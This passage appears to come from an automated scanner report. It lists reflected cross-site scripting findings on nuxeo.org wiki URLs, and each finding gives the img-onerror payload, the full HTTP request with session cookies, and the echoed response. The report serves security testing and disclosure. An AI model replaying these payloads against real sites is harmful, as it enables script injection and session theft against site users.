
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/FAQ8dc28%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee5ffb44f0ee/">FAQ8dc28<img src=a onerror=alert(1)>e5ffb44f0ee</a>
...[SNIP]...

1.35. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/DownloadingNuxeoSources

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58367"><img%20src%3da%20onerror%3dalert(1)>5591b8e1ed1 was submitted in the REST URL parameter 4. This input was echoed as 58367"><img src=a onerror=alert(1)>5591b8e1ed1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ58367"><img%20src%3da%20onerror%3dalert(1)>5591b8e1ed1/DownloadingNuxeoSources HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:00 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13132
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/FAQ58367%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5591b8e1ed1/DownloadingNuxeoSources?format=xar&amp;name=FAQ58367"><img src=a onerror=alert(1)>5591b8e1ed1.DownloadingNuxeoSources&amp;pages=FAQ58367">
...[SNIP]...

1.36. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/DownloadingNuxeoSources

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd998"><img%20src%3da%20onerror%3dalert(1)>abc85857786 was submitted in the REST URL parameter 5. This input was echoed as dd998"><img src=a onerror=alert(1)>abc85857786 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ/DownloadingNuxeoSourcesdd998"><img%20src%3da%20onerror%3dalert(1)>abc85857786 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13116
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/FAQ/DownloadingNuxeoSourcesdd998%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eabc85857786?format=xar&amp;name=FAQ.DownloadingNuxeoSourcesdd998"><img src=a onerror=alert(1)>abc85857786&amp;pages=FAQ.DownloadingNuxeoSourcesdd998">
...[SNIP]...

1.37. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/DownloadingNuxeoSources

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3aa95<img%20src%3da%20onerror%3dalert(1)>d376d3b62f2 was submitted in the REST URL parameter 5. This input was echoed as 3aa95<img src=a onerror=alert(1)>d376d3b62f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ/DownloadingNuxeoSources3aa95<img%20src%3da%20onerror%3dalert(1)>d376d3b62f2 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:00 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13054
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources3aa95%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed376d3b62f2'>DownloadingNuxeoSources3aa95<img src=a onerror=alert(1)>d376d3b62f2</a>
...[SNIP]...

1.38. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/LDAPSetup

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a33f4<img%20src%3da%20onerror%3dalert(1)>95c2826bc91 was submitted in the REST URL parameter 4. This input was echoed as a33f4<img src=a onerror=alert(1)>95c2826bc91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQa33f4<img%20src%3da%20onerror%3dalert(1)>95c2826bc91/LDAPSetup HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:05 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12884
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/FAQa33f4%3Cimg+src%3Da+onerror%3Dalert%281%29%3E95c2826bc91/">FAQa33f4<img src=a onerror=alert(1)>95c2826bc91</a>
...[SNIP]...

1.39. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/LDAPSetup

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c16a0"><img%20src%3da%20onerror%3dalert(1)>31ada847d4a was submitted in the REST URL parameter 4. This input was echoed as c16a0"><img src=a onerror=alert(1)>31ada847d4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQc16a0"><img%20src%3da%20onerror%3dalert(1)>31ada847d4a/LDAPSetup HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/FAQc16a0%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E31ada847d4a/LDAPSetup?format=xar&amp;name=FAQc16a0"><img src=a onerror=alert(1)>31ada847d4a.LDAPSetup&amp;pages=FAQc16a0">
...[SNIP]...

1.40. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/LDAPSetup

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5070b"><img%20src%3da%20onerror%3dalert(1)>fc9a2887578 was submitted in the REST URL parameter 5. This input was echoed as 5070b"><img src=a onerror=alert(1)>fc9a2887578 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ/LDAPSetup5070b"><img%20src%3da%20onerror%3dalert(1)>fc9a2887578 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:53 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12934
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/FAQ/LDAPSetup5070b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Efc9a2887578?format=xar&amp;name=FAQ.LDAPSetup5070b"><img src=a onerror=alert(1)>fc9a2887578&amp;pages=FAQ.LDAPSetup5070b">
...[SNIP]...

1.41. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/LDAPSetup

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8e8b8<img%20src%3da%20onerror%3dalert(1)>61eca1214c4 was submitted in the REST URL parameter 5. This input was echoed as 8e8b8<img src=a onerror=alert(1)>61eca1214c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ/LDAPSetup8e8b8<img%20src%3da%20onerror%3dalert(1)>61eca1214c4 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:38 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12872
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup8e8b8%3Cimg+src%3Da+onerror%3Dalert%281%29%3E61eca1214c4'>LDAPSetup8e8b8<img src=a onerror=alert(1)>61eca1214c4</a>
...[SNIP]...

1.42. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 883c9"><img%20src%3da%20onerror%3dalert(1)>af89e0dea9c was submitted in the REST URL parameter 4. This input was echoed as 883c9"><img src=a onerror=alert(1)>af89e0dea9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main883c9"><img%20src%3da%20onerror%3dalert(1)>af89e0dea9c/ HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Community/SeamInProduction
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.org
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:00:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=78A0BE22BEAC05AFF375FF19572707F9; Path=/xwiki
Set-Cookie: visitid=09EFPUXSZN169ZNGLMQT1PAAT0E1VQX9; Path=/
Via: 1.1 www.nuxeo.org
Content-Length: 12909

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main883c9%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eaf89e0dea9c/WebHome?format=xar&amp;name=Main883c9"><img src=a onerror=alert(1)>af89e0dea9c.WebHome&amp;pages=Main883c9">
...[SNIP]...

1.43. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa3d<img%20src%3da%20onerror%3dalert(1)>dfd0885cdbe was submitted in the REST URL parameter 4. This input was echoed as 5aa3d<img src=a onerror=alert(1)>dfd0885cdbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main5aa3d<img%20src%3da%20onerror%3dalert(1)>dfd0885cdbe/ HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Community/SeamInProduction
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.org
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:01:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=BE6193AFA1980F364551483A4D5729AF; Path=/xwiki
Set-Cookie: visitid=FXOAWSE7OHZEHURNNDFQOSCOMRPDEOQF; Path=/
Via: 1.1 www.nuxeo.org
Content-Length: 12843

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main5aa3d%3Cimg+src%3Da+onerror%3Dalert%281%29%3Edfd0885cdbe/">Main5aa3d<img src=a onerror=alert(1)>dfd0885cdbe</a>
...[SNIP]...

1.44. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Ajax4JSF+Good+practices

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d8263<img%20src%3da%20onerror%3dalert(1)>e718aef40bc was submitted in the REST URL parameter 4. This input was echoed as d8263<img src=a onerror=alert(1)>e718aef40bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maind8263<img%20src%3da%20onerror%3dalert(1)>e718aef40bc/Ajax4JSF+Good+practices HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13083
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maind8263%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee718aef40bc/">Maind8263<img src=a onerror=alert(1)>e718aef40bc</a>
...[SNIP]...

1.45. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Ajax4JSF+Good+practices

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4463e"><img%20src%3da%20onerror%3dalert(1)>9bc0f92181 was submitted in the REST URL parameter 4. This input was echoed as 4463e"><img src=a onerror=alert(1)>9bc0f92181 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main4463e"><img%20src%3da%20onerror%3dalert(1)>9bc0f92181/Ajax4JSF+Good+practices HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:31 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13136
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main4463e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9bc0f92181/Ajax4JSF+Good+practices?format=xar&amp;name=Main4463e"><img src=a onerror=alert(1)>9bc0f92181.Ajax4JSF Good practices&amp;pages=Main4463e">
...[SNIP]...

1.46. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Ajax4JSF+Good+practices

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11711"><img%20src%3da%20onerror%3dalert(1)>f6ef0055e76 was submitted in the REST URL parameter 5. This input was echoed as 11711"><img src=a onerror=alert(1)>f6ef0055e76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Ajax4JSF+Good+practices11711"><img%20src%3da%20onerror%3dalert(1)>f6ef0055e76 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13133
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Ajax4JSF+Good+practices11711%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef6ef0055e76?format=xar&amp;name=Main.Ajax4JSF Good practices11711"><img src=a onerror=alert(1)>f6ef0055e76&amp;pages=Main.Ajax4JSF Good practices11711">
...[SNIP]...

1.47. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Ajax4JSF+Good+practices

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bbc96<img%20src%3da%20onerror%3dalert(1)>aa677fb915a was submitted in the REST URL parameter 5. This input was echoed as bbc96<img src=a onerror=alert(1)>aa677fb915a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

